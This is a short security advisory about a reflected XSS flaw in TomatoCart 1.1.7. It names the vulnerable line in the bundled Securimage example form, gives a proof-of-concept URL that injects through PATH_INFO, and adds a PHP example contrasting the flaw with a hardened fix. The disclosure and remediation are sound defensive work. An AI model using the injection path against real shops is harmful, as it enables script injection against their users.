-------------------------------------------------------------
Name    : TomatoCart 1.1.7 XSS 
-------------------------------------------------------------
Date    : 29.08.2012
-------------------------------------------------------------
Site    : www.tomatocart.com
-------------------------------------------------------------
Version : 1.1.7
-------------------------------------------------------------

1) What is it?
  This is a very nice shopping cart package; you should try it! ;)


2) Type of bug?
  XSS


3) Where is the bug?

Try here:
tomatocart/ext/securimage/example_form.ajax.php:39:
            new Ajax.Request('<?php echo $_SERVER['PHP_SELF'] ?>',

$_SERVER['PHP_SELF'] is echoed unescaped into a JavaScript string literal inside a <script> block. PHP_SELF is the script name plus any PATH_INFO appended to the URL, so the reflected value is under the requester's control.


4) PoC
  http://host/with/tomato/ext/securimage/example_form.ajax.php/"></script><whatever.now>
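The vulnerable pattern from line 39 next to a hardened version, as an added example that is not code from TomatoCart or Securimage. The $_SERVER values are constructed here (using the PoC string from section 4) so the snippet runs from the command line; the function names are mine.

```php
<?php
// Added example, not from TomatoCart or Securimage.
// Constructed request: script name plus a PATH_INFO suffix taken from the PoC above.
$_SERVER['SCRIPT_NAME'] = '/ext/securimage/example_form.ajax.php';
$_SERVER['PATH_INFO']   = '/"></script><whatever.now>';
$_SERVER['PHP_SELF']    = $_SERVER['SCRIPT_NAME'] . $_SERVER['PATH_INFO'];

// Vulnerable pattern (line 39): raw PHP_SELF inside a single-quoted JS string.
// Because PHP_SELF carries PATH_INFO, the quote and </script> in the suffix
// terminate the literal and the script element.
function vulnerable_request_url(): string
{
    return "new Ajax.Request('" . $_SERVER['PHP_SELF'] . "',";
}

// Hardened: use SCRIPT_NAME (no PATH_INFO) and emit a JS string literal with
// json_encode; the JSON_HEX_* flags encode quotes, angle brackets and
// ampersands so the value can neither break out of the literal nor close
// the enclosing <script> element.
function hardened_request_url(): string
{
    $url = json_encode(
        $_SERVER['SCRIPT_NAME'],
        JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP
    );
    return "new Ajax.Request(" . $url . ",";
}

echo vulnerable_request_url(), PHP_EOL;
echo hardened_request_url(), PHP_EOL;
```

Run it with `php` on the command line and compare the two emitted lines: the first still contains the raw closing quote and </script>, the second contains only the script path as a quoted literal. For an audit of an installed copy, grepping the tree for `PHP_SELF` finds every place the same pattern is used; each occurrence in a JS or HTML context needs SCRIPT_NAME plus context-appropriate encoding (json_encode for script literals, htmlspecialchars with ENT_QUOTES for attributes).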


5) More?

http://hauntit.blogspot.com
http://www.portswigger.org
http://www.tomatocart.com